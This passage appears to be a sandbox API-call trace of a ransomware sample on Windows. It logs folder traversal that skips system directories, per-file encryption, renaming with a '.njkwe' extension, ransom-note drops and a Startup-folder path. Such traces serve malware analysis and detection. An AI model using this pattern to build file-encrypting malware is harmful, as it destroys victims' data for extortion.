SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.661] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.661] GetProcessHeap () returned 0xbe0000 [0061.661] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.661] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.661] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.661] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.661] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.661] CloseHandle (hObject=0x42c) returned 1 [0061.662] GetProcessHeap () returned 0xbe0000 [0061.662] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.662] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.663] GetProcessHeap () returned 0xbe0000 [0061.663] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.663] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.663] FindClose (in: hFindFile=0xc1a3a0 | out: hFindFile=0xc1a3a0) returned 1 [0061.663] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.663] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1046\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.664] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.665] CloseHandle (hObject=0x428) returned 1 [0061.665] GetProcessHeap () returned 0xbe0000 [0061.665] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.665] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1049", cAlternateFileName="")) returned 1 [0061.665] lstrcmpiW (lpString1="1049", lpString2="Windows") returned -1 [0061.665] lstrcmpiW (lpString1="1049", lpString2="$Recycle.bin") returned 1 [0061.665] lstrcmpiW (lpString1="1049", lpString2="System Volume Information") returned -1 [0061.665] lstrcmpiW (lpString1="1049", lpString2="Program Files") returned -1 [0061.665] lstrcmpiW (lpString1="1049", lpString2="Program Files (x86)") returned -1 [0061.665] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049") returned 30 [0061.666] lstrcmpW (lpString1="1049", lpString2=".") returned 1 [0061.666] lstrcmpW (lpString1="1049", lpString2="..") returned 1 [0061.666] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.666] GetProcessHeap () returned 0xbe0000 [0061.666] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.666] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\*") returned 32 [0061.666] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fe0 [0061.666] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.666] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.666] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.666] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.666] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.666] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\.") returned 32 [0061.666] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.666] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.666] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.666] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.666] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.666] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.666] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.666] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\..") returned 33 [0061.666] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.666] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.666] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.666] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.666] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.666] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.666] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.666] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.667] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 39 [0061.667] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.667] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.667] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.667] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.667] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.667] GetTickCount () returned 0x114fd7c [0061.667] GetTickCount () returned 0x114fd7c [0061.667] GetTickCount () returned 0x114fd7c [0061.667] GetTickCount () returned 0x114fd7c [0061.667] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.668] GetProcessHeap () returned 0xbe0000 [0061.668] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.668] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.669] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.669] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.670] GetProcessHeap () returned 0xbe0000 [0061.670] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.670] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.670] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.670] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.670] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.670] CloseHandle (hObject=0x42c) returned 1 [0061.672] GetProcessHeap () returned 0xbe0000 [0061.672] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.672] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.672] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.674] GetProcessHeap () returned 0xbe0000 [0061.674] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.674] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.674] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.674] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.674] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.674] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.674] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.674] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 48 [0061.674] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.674] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.674] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.674] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.675] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.675] GetTickCount () returned 0x114fd8b [0061.675] GetTickCount () returned 0x114fd8b [0061.675] GetTickCount () returned 0x114fd8b [0061.675] GetTickCount () returned 0x114fd8b [0061.675] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.675] GetProcessHeap () returned 0xbe0000 [0061.675] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.675] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.677] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.677] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.677] GetProcessHeap () returned 0xbe0000 [0061.677] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.677] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.677] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.677] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.678] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.678] CloseHandle (hObject=0x42c) returned 1 [0061.680] GetProcessHeap () returned 0xbe0000 [0061.680] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.680] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.680] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.680] GetProcessHeap () returned 0xbe0000 [0061.680] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.680] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.680] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.680] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.680] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.680] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.680] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.680] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 49 [0061.680] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.681] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.681] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.681] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.681] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.681] GetTickCount () returned 0x114fd8b [0061.681] GetTickCount () returned 0x114fd8b [0061.681] GetTickCount () returned 0x114fd8b [0061.681] GetTickCount () returned 0x114fd8b [0061.681] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.681] GetProcessHeap () returned 0xbe0000 [0061.681] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.681] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.731] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.731] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.735] GetProcessHeap () returned 0xbe0000 [0061.735] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.735] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.735] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.735] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.735] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.736] CloseHandle (hObject=0x42c) returned 1 [0061.740] GetProcessHeap () returned 0xbe0000 [0061.740] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.740] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.740] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.741] GetProcessHeap () returned 0xbe0000 [0061.741] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.741] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.741] FindClose (in: hFindFile=0xc19fe0 | out: hFindFile=0xc19fe0) returned 1 [0061.741] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.741] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1049\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.742] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.742] CloseHandle (hObject=0x428) returned 1 [0061.743] GetProcessHeap () returned 0xbe0000 [0061.743] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.743] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1053", cAlternateFileName="")) returned 1 [0061.743] lstrcmpiW (lpString1="1053", lpString2="Windows") returned -1 